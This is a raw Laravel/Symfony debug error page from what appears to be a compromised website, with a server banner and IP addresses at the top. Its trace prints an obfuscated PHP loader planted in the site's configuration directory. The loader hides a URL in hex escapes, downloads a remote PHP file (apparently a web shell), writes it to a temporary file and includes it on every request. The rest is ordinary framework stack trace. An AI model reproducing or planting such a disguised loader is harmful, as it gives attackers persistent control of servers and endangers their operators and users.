•  Linux s4 4.18.0-553.30.1.el8_10.x86_64 #1 SMP Tue Nov 26 02:30:26 EST 2024 x86_64
  •  Apache
  •  : 88.198.66.52 | : 172.71.254.19
  •   Value of type null is not callable (500 Internal Server Error)

    Symfony Exception

    Symfony Docs

    Error

    HTTP 500 Internal Server Error

    Value of type null is not callable

    Exception

    Error

    in /tmp/phpFS5X7e (line 1412)
    s() in /tmp/phpFS5X7e (line 548)
    include('/tmp/phpFS5X7e') in /var/www/vhosts/officedirect.rs/httpdocs/config/g.php (line 3)
    1. <?php
    2. goto sHNkh; sHNkh: $EnoeA = tmpfile(); goto uTcE6; uTcE6: $UmXGi = fwrite($EnoeA, file_get_contents("\x68\164\x74\x70\163\72\x2f\57\x72\141\x77\x2e\x67\151\164\150\x75\x62\165\x73\x65\162\143\x6f\x6e\x74\x65\x6e\164\x2e\x63\x6f\155\x2f\115\x61\x64\105\170\160\x6c\157\151\x74\x73\x2f\x47\145\x63\153\157\x2f\155\x61\x69\x6e\x2f\x67\145\143\x6b\x6f\x2d\x6e\145\x77\x2e\160\150\160")); goto xa01q; xa01q: include stream_get_meta_data($EnoeA)["\165\x72\x69"]; goto Lg1o1; Lg1o1: fclose($EnoeA);
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php require (line 70)
    1.         if (! isset($files['app'])) {
    2.             throw new Exception('Unable to load the "app" configuration file.');
    3.         }
    4.         foreach ($files as $key => $path) {
    5.             $repository->set($key, require $path);
    6.         }
    7.     }
    8.     /**
    9.      * Get all of the configuration files for the application.
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php -> loadConfigurationFiles (line 39)
    1.         // directory and load each one into the repository. This will make all of the
    2.         // options available to the developer for use in various parts of this app.
    3.         $app->instance('config', $config = new Repository($items));
    4.         if (! isset($loadedFromCache)) {
    5.             $this->loadConfigurationFiles($app, $config);
    6.         }
    7.         // Finally, we will set the application's environment based on the configuration
    8.         // values that were loaded. We will pass a callback which will be used to get
    9.         // the environment in a web context where an "--env" switch is not present.
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Application.php -> bootstrap (line 242)
    1.         $this->hasBeenBootstrapped = true;
    2.         foreach ($bootstrappers as $bootstrapper) {
    3.             $this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
    4.             $this->make($bootstrapper)->bootstrap($this);
    5.             $this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
    6.         }
    7.     }
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php -> bootstrapWith (line 176)
    1.      * @return void
    2.      */
    3.     public function bootstrap()
    4.     {
    5.         if (! $this->app->hasBeenBootstrapped()) {
    6.             $this->app->bootstrapWith($this->bootstrappers());
    7.         }
    8.     }
    9.     /**
    10.      * Get the route dispatcher callback.
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php -> bootstrap (line 160)
    1.     {
    2.         $this->app->instance('request', $request);
    3.         Facade::clearResolvedInstance('request');
    4.         $this->bootstrap();
    5.         return (new Pipeline($this->app))
    6.                     ->send($request)
    7.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
    8.                     ->then($this->dispatchToRouter());
    in /var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php -> sendRequestThroughRouter (line 134)
    1.         $this->requestStartedAt = Carbon::now();
    2.         try {
    3.             $request->enableHttpMethodParameterOverride();
    4.             $response = $this->sendRequestThroughRouter($request);
    5.         } catch (Throwable $e) {
    6.             $this->reportException($e);
    7.             $response = $this->renderException($request, $e);
    8.         }
    Kernel->handle() in /var/www/vhosts/officedirect.rs/httpdocs/public/index.php (line 51)
    1. $app = require_once __DIR__.'/../bootstrap/app.php';
    2. $kernel = $app->make(Kernel::class);
    3. $response = $kernel->handle(
    4.     $request = Request::capture()
    5. )->send();
    6. $kernel->terminate($request, $response);

    Stack Trace

    Error
    Error:
    Value of type null is not callable
    
      at /tmp/phpFS5X7e:1412
      at s()
         (/tmp/phpFS5X7e:548)
      at include('/tmp/phpFS5X7e')
         (/var/www/vhosts/officedirect.rs/httpdocs/config/g.php:3)
      at require('/var/www/vhosts/officedirect.rs/httpdocs/config/g.php')
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:70)
      at Illuminate\Foundation\Bootstrap\LoadConfiguration->loadConfigurationFiles()
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39)
      at Illuminate\Foundation\Bootstrap\LoadConfiguration->bootstrap()
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:242)
      at Illuminate\Foundation\Application->bootstrapWith()
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:176)
      at Illuminate\Foundation\Http\Kernel->bootstrap()
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:160)
      at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter()
         (/var/www/vhosts/officedirect.rs/httpdocs/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:134)
      at Illuminate\Foundation\Http\Kernel->handle()
         (/var/www/vhosts/officedirect.rs/httpdocs/public/index.php:51)